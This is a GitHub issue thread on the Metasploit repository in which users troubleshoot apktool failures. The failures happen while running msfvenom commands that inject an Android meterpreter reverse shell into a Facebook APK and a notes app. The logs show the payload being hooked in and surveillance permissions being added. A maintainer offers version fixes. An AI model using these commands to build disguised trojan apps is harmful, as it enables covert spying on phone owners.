### ISSUE TITLE
Error: apktool execution failed

### ISSUE THREAD

**Issue by JunGkOogOppA** [rapid7/metasploit-framework#16453]
Now i have this problem 😢 Error: apktool execution failed can anyone help me please?
![Screenshot_20220414-144605](https://user-images.githubusercontent.com/96369229/163354215-e77c7e10-6fe9-4481-bf79-22535f248349.png)
The full problem-

```
hello1562007@cs-262852264520-default ~/metasploit-framework (master) [2]> ./msfvenom -x facebook.apk -p android/meterpreter/reverse_tcp LHOST=172.17.0.4 LPORT=4444 -o fblite.apk
Using APK template: facebook.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[-] I: Using Apktool 2.6.1 on original.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
W: Could not decode attr value, using undecoded value instead: ns=android, name=versionCode, value=0x15ab060f
W: Could not decode attr value, using undecoded value instead: ns=android, name=versionName, value=0x000000e0
W: Could not decode attr value, using undecoded value instead: ns=android, name=versionCode, value=0x15ab060f
W: Could not decode attr value, using undecoded value instead: ns=android, name=versionName, value=0x000000e0
W: Could not decode attr value, using undecoded value instead: ns=android, name=compileSdkVersion, value=0x0000001f
W: Could not decode attr value, using undecoded value instead: ns=android, name=compileSdkVersionCodename, value=0x000000de
W: Could not decode attr value, using undecoded value instead: ns=android, name=minSdkVersion, value=0x0000000f
W: Could not decode attr value, using undecoded value instead: ns=android, name=targetSdkVersion, value=0x0000001f
W: Could not decode attr value, using undecoded value instead: ns=android, name=anyDensity, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=smallScreens, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=normalScreens, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=largeScreens, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000ed
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000ee
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000f3
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000f2
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000ef
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000f1
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000f0
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000f5
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000f4
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000019c
W: Could not decode attr value, using undecoded value instead: ns=android, name=protectionLevel, value=0x00000002
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000019b
W: Could not decode attr value, using undecoded value instead: ns=android, name=protectionLevel, value=0x00000002
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000107
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000108
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000109
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000010a
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000010c
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000010e
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000010f
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000110
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000111
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000112
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000115
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000116
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000119
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000118
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000011a
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000114
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000010b
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000117
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000011c
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000011b
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000011d
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000011e
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000011f
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000122
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000121
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000124
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000125
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000126
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000127
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000128
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000131
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000132
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000019c
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000145
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000193
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000192
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001b1
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000019b
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001cc
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001cb
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001c4
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001c5
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001cd
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001ce
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001c6
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001c7
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001c8
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001c9
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001ca
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000120
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000123
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001a9
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000138
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001aa
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001a5
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000113
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001b6
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000105
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001b4
W: Could not decode attr value, using undecoded value instead: ns=android, name=theme, value=0x7f0f0017
W: Could not decode attr value, using undecoded value instead: ns=android, name=label, value=0x7f0e0002
W: Could not decode attr value, using undecoded value instead: ns=android, name=icon, value=0x7f0b0000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000148
W: Could not decode attr value, using undecoded value instead: ns=android, name=manageSpaceActivity, value=0x0000018d
W: Could not decode attr value, using undecoded value instead: ns=android, name=debuggable, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=allowBackup, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=vmSafeMode, value=0x7f040000
W: Could not decode attr value, using undecoded value instead: ns=android, name=hardwareAccelerated, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=supportsRtl, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=networkSecurityConfig, value=0x7f110001
W: Could not decode attr value, using undecoded value instead: ns=android, name=appComponentFactory, value=0x0000012b
W: Could not decode attr value, using undecoded value instead: ns=android, name=requestLegacyExternalStorage, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001b2
W: Could not decode attr value, using undecoded value instead: ns=android, name=value, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000141
W: Could not decode attr value, using undecoded value instead: ns=android, name=value, value=0x0000012a
Exception in thread "main" java.lang.NullPointerException
        at java.base/java.util.regex.Matcher.getTextLength(Matcher.java:1770)
        at java.base/java.util.regex.Matcher.reset(Matcher.java:416)
        at java.base/java.util.regex.Matcher.<init>(Matcher.java:253)
        at java.base/java.util.regex.Pattern.matcher(Pattern.java:1133)
        at brut.androlib.res.decoder.AndroidManifestResourceParser.isNumericStringMetadataAttributeValue(AndroidManifestResourceParser.java:56)
        at brut.androlib.res.decoder.AndroidManifestResourceParser.getAttributeValue(AndroidManifestResourceParser.java:41)
        at org.xmlpull.v1.wrapper.classic.XmlPullParserDelegate.getAttributeValue(XmlPullParserDelegate.java:69)
        at org.xmlpull.v1.wrapper.classic.StaticXmlSerializerWrapper.writeStartTag(StaticXmlSerializerWrapper.java:267)
        at org.xmlpull.v1.wrapper.classic.StaticXmlSerializerWrapper.event(StaticXmlSerializerWrapper.java:211)
        at brut.androlib.res.decoder.XmlPullStreamDecoder$1.event(XmlPullStreamDecoder.java:80)
        at brut.androlib.res.decoder.XmlPullStreamDecoder.decode(XmlPullStreamDecoder.java:139)
        at brut.androlib.res.decoder.XmlPullStreamDecoder.decodeManifest(XmlPullStreamDecoder.java:151)
        at brut.androlib.res.decoder.ResFileDecoder.decodeManifest(ResFileDecoder.java:159)
        at brut.androlib.res.AndrolibResources.decodeManifestWithResources(AndrolibResources.java:193)
        at brut.androlib.Androlib.decodeManifestWithResources(Androlib.java:141)
        at brut.androlib.ApkDecoder.decode(ApkDecoder.java:109)
        at brut.apktool.Main.cmdDecode(Main.java:175)
        at brut.apktool.Main.main(Main.java:79)
Error: apktool execution failed
```

**Comment by bcoles** [comment]
Please paste the full stack trace.

**Comment by JunGkOogOppA** [comment]
> 

hello1562007@cs-262852264520-default ~/metasploit-framework (master) [2]> ./msfvenom -x facebook.apk -p android/meterpreter/reverse_tcp LHOST=172.17.0.4 LPORT=4444 -o fblite.apk
Using APK template: facebook.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[-] I: Using Apktool 2.6.1 on original.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
W: Could not decode attr value, using undecoded value instead: ns=android, name=versionCode, value=0x15ab060f
W: Could not decode attr value, using undecoded value instead: ns=android, name=versionName, value=0x000000e0
W: Could not decode attr value, using undecoded value instead: ns=android, name=versionCode, value=0x15ab060f
W: Could not decode attr value, using undecoded value instead: ns=android, name=versionName, value=0x000000e0
W: Could not decode attr value, using undecoded value instead: ns=android, name=compileSdkVersion, value=0x0000001f
W: Could not decode attr value, using undecoded value instead: ns=android, name=compileSdkVersionCodename, value=0x000000de
W: Could not decode attr value, using undecoded value instead: ns=android, name=minSdkVersion, value=0x0000000f
W: Could not decode attr value, using undecoded value instead: ns=android, name=targetSdkVersion, value=0x0000001f
W: Could not decode attr value, using undecoded value instead: ns=android, name=anyDensity, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=smallScreens, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=normalScreens, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=largeScreens, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000ed
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000ee
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000f3
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000f2
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000ef
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000f1
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000f0
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000f5
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000f4
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000019c
W: Could not decode attr value, using undecoded value instead: ns=android, name=protectionLevel, value=0x00000002
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000019b
W: Could not decode attr value, using undecoded value instead: ns=android, name=protectionLevel, value=0x00000002
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000107
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000108
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000109
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000010a
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000010c
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000010e
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000010f
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000110
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000111
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000112
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000115
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000116
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000119
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000118
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000011a
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000114
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000010b
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000117
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000011c
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000011b
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000011d
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000011e
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000011f
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000122
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000121
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000124
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000125
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000126
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000127
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000128
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000131
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000132
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000019c
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000145
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000193
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000192
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001b1
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000019b
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001cc
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001cb
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001c4
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001c5
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001cd
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001ce
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001c6
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001c7
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001c8
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001c9
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001ca
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000120
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000123
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001a9
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000138
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001aa
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001a5
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000113
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001b6
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000105
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001b4
W: Could not decode attr value, using undecoded value instead: ns=android, name=theme, value=0x7f0f0017
W: Could not decode attr value, using undecoded value instead: ns=android, name=label, value=0x7f0e0002
W: Could not decode attr value, using undecoded value instead: ns=android, name=icon, value=0x7f0b0000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000148
W: Could not decode attr value, using undecoded value instead: ns=android, name=manageSpaceActivity, value=0x0000018d
W: Could not decode attr value, using undecoded value instead: ns=android, name=debuggable, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=allowBackup, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=vmSafeMode, value=0x7f040000
W: Could not decode attr value, using undecoded value instead: ns=android, name=hardwareAccelerated, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=supportsRtl, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=networkSecurityConfig, value=0x7f110001
W: Could not decode attr value, using undecoded value instead: ns=android, name=appComponentFactory, value=0x0000012b
W: Could not decode attr value, using undecoded value instead: ns=android, name=requestLegacyExternalStorage, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001b2
W: Could not decode attr value, using undecoded value instead: ns=android, name=value, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000141
W: Could not decode attr value, using undecoded value instead: ns=android, name=value, value=0x0000012a
Exception in thread "main" java.lang.NullPointerException
        at java.base/java.util.regex.Matcher.getTextLength(Matcher.java:1770)
        at java.base/java.util.regex.Matcher.reset(Matcher.java:416)
        at java.base/java.util.regex.Matcher.<init>(Matcher.java:253)
        at java.base/java.util.regex.Pattern.matcher(Pattern.java:1133)
        at brut.androlib.res.decoder.AndroidManifestResourceParser.isNumericStringMetadataAttributeValue(AndroidManifestResourceParser.java:56)
        at brut.androlib.res.decoder.AndroidManifestResourceParser.getAttributeValue(AndroidManifestResourceParser.java:41)
        at org.xmlpull.v1.wrapper.classic.XmlPullParserDelegate.getAttributeValue(XmlPullParserDelegate.java:69)
        at org.xmlpull.v1.wrapper.classic.StaticXmlSerializerWrapper.writeStartTag(StaticXmlSerializerWrapper.java:267)
        at org.xmlpull.v1.wrapper.classic.StaticXmlSerializerWrapper.event(StaticXmlSerializerWrapper.java:211)
        at brut.androlib.res.decoder.XmlPullStreamDecoder$1.event(XmlPullStreamDecoder.java:80)
        at brut.androlib.res.decoder.XmlPullStreamDecoder.decode(XmlPullStreamDecoder.java:139)
        at brut.androlib.res.decoder.XmlPullStreamDecoder.decodeManifest(XmlPullStreamDecoder.java:151)
        at brut.androlib.res.decoder.ResFileDecoder.decodeManifest(ResFileDecoder.java:159)
        at brut.androlib.res.AndrolibResources.decodeManifestWithResources(AndrolibResources.java:193)
        at brut.androlib.Androlib.decodeManifestWithResources(Androlib.java:141)
        at brut.androlib.ApkDecoder.decode(ApkDecoder.java:109)
        at brut.apktool.Main.cmdDecode(Main.java:175)
        at brut.apktool.Main.main(Main.java:79)
Error: apktool execution failed

**Comment by bcoles** [comment]
This is a bug with `apktool`. This might help: https://github.com/iBotPeaches/Apktool/issues/2669#issuecomment-966302410

**Comment by bangkokhermetik** [comment]
Error: apktool execution failed i do not understand ..need some help thank you ! ;)
root㉿kali)-[/home/kali/Desktop/rollin]
└─# msfvenom -x note-1-9-1.apk --arch dalvik --platform android -p android/meterpreter/reverse_https lhost=19x.xxx.x.xx lport=443 -o myhackapk.apk
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here
Using APK template: note-1-9-1.apk
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package kx.app.notes.diary.memo.hfzew
[*] Loading /tmp/d20220819-12242-h5vnwy/original/smali/net/micode/notes/ui/NotesListActivity.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WAKE_LOCK"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20220819-12242-h5vnwy/output.apk
[-] I: Using Apktool 2.6.1-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
Exception in thread "main" java.lang.NoSuchMethodError: java.nio.ByteBuffer.clear()Ljava/nio/ByteBuffer;
        at org.jf.dexlib2.writer.DexWriter.writeAnnotationDirectories(DexWriter.java:919)
        at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:344)
        at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:300)
        at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:58)
        at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:37)
        at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:430)
        at brut.androlib.Androlib.buildSources(Androlib.java:361)
        at brut.androlib.Androlib.build(Androlib.java:313)
        at brut.androlib.Androlib.build(Androlib.java:280)
        at brut.apktool.Main.cmdBuild(Main.java:255)
        at brut.apktool.Main.main(Main.java:82)
Error: apktool execution failed

**Comment by bcoles** [comment]
> Error: apktool execution failed i do not understand ..need some help thank you ! ;)

The apktool version you're using contains `-dirty` flag. Try installing the [latest official version](https://github.com/iBotPeaches/Apktool/releases).

You can also check that you're using JDK11+

```
update-alternatives --config java
```

**Comment by TOXICCODER5715** [comment]
after trying all the solutions possible, i am still getting error: apk execution failed.

**Comment by bcoles** [comment]
> after trying all the solutions possible, i am still getting error: apk execution failed.

@TOXICCODER5715 There is not enough information to offer guidance. If you have an issue create a new issue. Spamming the same sentence on multiple issues is not helpful.
